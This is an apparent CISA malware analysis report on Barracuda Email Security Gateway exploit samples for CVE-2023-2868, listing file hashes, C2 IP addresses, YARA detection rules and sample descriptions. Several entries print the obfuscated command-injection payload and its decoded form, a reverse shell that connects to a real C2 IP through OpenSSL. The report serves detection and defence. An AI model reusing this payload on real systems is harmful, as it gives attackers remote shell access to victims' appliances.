Notification
This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
Summary
Description
CISA obtained 14 malware samples comprised of Barracuda exploit payloads and reverse shell backdoors. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).
The payload triggers a command injection (exploiting CVE-2023-2868), leading to dropping and execution of reverse shells on the ESG appliance. The reverse shells establish backdoor communications via OpenSSL with threat actor command and control (C2) servers. The actors delivered this payload to the victim via a phishing email with a malicious .tar attachment.
For information about related malware, specifically information on other backdoors, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors .
Download the PDF version of this report:
For a downloadable copy of IOCs associated with this MAR in JSON format, see:
Submitted Files (14)
0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6 (1665808485-0a151737759a8a30001...)
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b (abcdefgc2V0c2lkIHNoIC1jICJta2Z...)
2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095 (1665807519-0a151737759a87f0001...)
2b2b7c5e825b7a18e13319b4a1275a0dd0086abd58b2d45939269d5a613a41e7 (abcdefgc2V0c2lkIHNoIC1jICJta2Z...)
3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7 (1666612441-0a151727b565980001-...)
80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043 (1666612600-0a151727b265b10001-...)
949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788 (snapshot.tar)
9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5 (1666612304-0a151727b165810001-...)
b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321 (1666582925-0a151727b55a9c0001-...)
b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2 (1666583888-0a151727b45ada0001-...)
caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd (1665808277-0a1517307c0bbc0001-...)
cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba (1665808153-0a1517307c0bb70001-...)
f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0 (snapshot0.tar)
f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa (1666614870-0a151727b166b50001-...)
IPs (2)
107[.]148[.]219[.]54
107[.]148[.]223[.]196
Findings
2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095
Tags
backdoortrojan
Details
-->
Name
1665807519-0a151737759a87f0001-RIRGpJ
Size
29888 bytes
Type
ASCII text
MD5
5bbdcca59916d40c178fd29a743fc9eb
SHA1
4bd4f014ceeffbe2b1e61f5d279416a80ec9eafe
SHA256
2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095
SHA512
17a07d6d3164159ace01099bdee560bd63f980d083b6a1650880b50bcfe63b9eda8b1ba7932c7527457d368005d61745a21fa4252a9e2b81ea3a9a34e4d33ea0
ssdeep
96:e1mfYp+YQicdb34VB+1jhuBj1rH4equdK3b7OKiTcGuRNdecg6dxkXBd6Uq:pW+UOb3QBkjh89H4q6fbP
Entropy
1.661629
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
2a860849a9...
Connected_To
107[.]148[.]223[.]196
Description
This file is related to the vulnerability CVE-2023-2868 in the Barracuda ESG exploit to execute a reverse shell payload on certain ESG appliances. This sample contains a Base64 encoded block that upon decoding references multiple archive files. There are multiple file references in the block, however, only one contains the exploit code in the title and can be found between two single quotes and backticks '`abcdefg=payload`' (Figure 1). This payload triggers a command injection and upon successful exploitation of the affected system the encoded commands are able to run and provide the Threat Actor (TA) with a response.
--Begin Encoded Payload--
'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'
--End Encoded Payload--
The encoded block above decodes to a reverse shell seen below.
--Begin Decoded Command--
setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"
--End Decoded Command--
This reverse shell starts a new session and sets it to run in the background. Then it creates the named pipe "/tmp/p" that it will use as a point to transfer the commands that will be executed.
The rest of the command is seen using OpenSSL to create a client that connects to the Command-and-Control (C2) at Internet Protocol (IP) address “107[.]148[.]223[.]196” and port number “8080.” The OpenSSL command also suppresses session and certificate output info using -quiet flag and errors are discarded for stealth in the /dev/null directory. Finally, the named pipe "tmp/p" is removed when the OpenSSL connection is closed.
Screenshots
Figure 1. - Base64 encoded block decodes to another Base64 encoded payload.
cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba
Tags
backdoortrojan
Details
-->
Name
1665808153-0a1517307c0bb70001-RIRGpJ
Size
29887 bytes
Type
ASCII text
MD5
1424d7cf2515f97e21bbd9c94d187dab
SHA1
f7df6eb42ce9979babbd9fb1373bbf260dcfe4e5
SHA256
cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba
SHA512
febc0f0bee4b8a4209a7768cf2285550b571506f9d56ffbdf5a262f81d4e28df38e8e78691f05ee408ef464715e213602860332e638d28e0976e56a8fc587662
ssdeep
96:i1mJ5p+Yuicd4344D+7jhugE1rH4equdK3b7OKiTcGuRNdecg6dxkXBd6UH:7j+yO435DOjhu9H4q6fbC
Entropy
1.661365
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
cf0996a3ae...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains the same payloads as “2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095.”
caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd
Tags
backdoortrojan
Details
-->
Name
1665808277-0a1517307c0bbc0001-RIRGpJ
Size
29887 bytes
Type
ASCII text
MD5
bd238e645c350329b0a42264dc6fdea7
SHA1
f61238d4bbe1927e827ffd03457c1d60b1ce6350
SHA256
caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd
SHA512
fc298c3cee79f2d965d8464746dea4259209bd5f7bb4ee2825e92ca1fad2b65c9b02d93406da8de1c7f2e3e0a08b2a430f95b0b55e009f2ff71e0f4fa6305f52
ssdeep
96:71mv1p+YQicdcs45k+Ujhu0w1rH4equdK3b7OKiTcGuRNdecg6dxkXBd6Ujn:6X+0OcsQkNjhe9H4q6fb2
Entropy
1.662428
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
caa795c4c9...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains the same payloads as “2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095.”
0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6
Tags
backdoortrojan
Details
-->
Name
1665808485-0a151737759a8a30001-RIRGpJ
Size
29888 bytes
Type
ASCII text
MD5
3e01f48ab1bfae888b2c580dbc6c5962
SHA1
6f7d8d31d1d0c53d71495176aa4ab23756bbba24
SHA256
0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6
SHA512
ea5b2437c99c766050fddc2cad00b3d863ceae41d7d0be2b67ded74b146800de2ef7261d003d1bb341a8cff4ddd789f2c615daa423d9ab2a7f04b3a1d353d2eb
ssdeep
96:+1mAIp+Y/icd7s42dB+1jhPBD1rH4equdK3b7OKiTcGuRNdecg6dxkXBd6Ua:em+ZO7sfBkjh79H4q6fbf
Entropy
1.662592
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
0b917d945a...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains the same payloads as “2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095.”
b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321
Tags
backdoortrojan
Details
-->
Name
1666582925-0a151727b55a9c0001-RIRGpJ
Size
29883 bytes
Type
ASCII text
MD5
db1215b51c86aa12564dd5b825e81e43
SHA1
a3b9b846467973038b1232f2c2189c02023b1dd8
SHA256
b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321
SHA512
4b0be07290895cfae3e29d7675c83ee48e0f3eedab6be55db5d426799cbc25905eecfba92664bf3137c610cfca74826e2c2ec813ca6ff7c23c5584258219b478
ssdeep
96:LRKtqi+YiFOiclLs42dB+1jhtVP1rHNqudK3b7OKiTcGuRNdecg6dxkXBd6U2:Ny+xFJYLsfBkjhJLH4q6fbD
Entropy
1.661150
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
b5113e29ec...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains a payload that exploits CVE-2023-2868. The exploit payload is a shell script code with an embedded Base64 encoded reverse shell. Upon execution the malware Base64 decodes and executes the reverse shell code. The reverse shell establishes connections using the "OpenSSL" to the C2 IP "107[.]148[.]223[.]196" and port “443” and redirects the standard input and output to the named pipe at "/tmp/p" and then removes "/tmp/p" after the connection is closed.
--Begin Encoded Payload--
'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6NDQzID4vdG1wL3AgMj4vZGV2L251bGw7cm0gL3RtcC9wIg==;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'
--End Encoded Payload--
--Begin Decoded Payload--
setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:443 >/tmp/p 2>/dev/null;rm /tmp/p"
--End Decoded Payload--
b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2
Tags
backdoortrojan
Details
-->
Name
1666583888-0a151727b45ada0001-RIRGpJ
Size
29883 bytes
Type
ASCII text
MD5
c479667bd581845d1e295becc1d4859f
SHA1
a982111f1463e90a46a62da4fb8e47bbf4db025e
SHA256
b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2
SHA512
834fbf3c821a27588d6c7b46c56296505bdb9e34880e7c3c234c7fa3f9ee46c115d632d413f13278b9de792b5bd8e87ab561ad50bd8a25d43dbafa9b22b8bc30
ssdeep
96:GhKWqi+YDeiclHs42B+1jhtNzfH1rHNqudK3b7OKiTcGuRNdecg6dxkXBd6UG:Et+I5YHs7BkjhPLdLH4q6fbT
Entropy
1.661755
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
b52a9844d8...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”
9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5
Tags
backdoortrojan
Details
-->
Name
1666612304-0a151727b165810001-RIRGpJ
Size
29883 bytes
Type
ASCII text
MD5
33d16ab60d262191f4a251e31a5d1940
SHA1
15e3a9a643ebc5fc8e240b2617ce9720e4c16aa2
SHA256
9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5
SHA512
feab76baea3e0701dd025b140cde25c1b7516ca9bca49ee8e3728b5d787e8a25ef456b094594f9fc30b89c64b776ab5120617ee4f2012d74f6327dff09f0c14f
ssdeep
96:q1Djqi+Yziclds42dB+1jhXIM1rHNqudK3b7OKiTcGuRNdecg6dxkXBd6UP:oj+VYdsfBkjhRLH4q6fbK
Entropy
1.660671
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
9d0c7a45dd...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”
3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7
Tags
backdoortrojan
Details
-->
Name
1666612441-0a151727b565980001-RIRGpJ
Size
29883 bytes
Type
ASCII text
MD5
84603aa2f1d30f6b137a6b9300f2adcc
SHA1
ab9942e172733ec3265dd93e0033e2ace77905c1
SHA256
3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7
SHA512
96499176dc81f64f3ab0daf7319bd1dc54301ccaada75d37a8377584f6044774e103361f207f6f204e62f251ae41e639f923c25cf2feee5b2557d10908bb54c5
ssdeep
96:vm1soERqi+YhiclRs42dB+1jhXtH1rHNqudK3b7OKiTcGuRNdecg6dxkXBd6U+:+Eh+7YRsfBkjh7LH4q6fbL
Entropy
1.660213
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
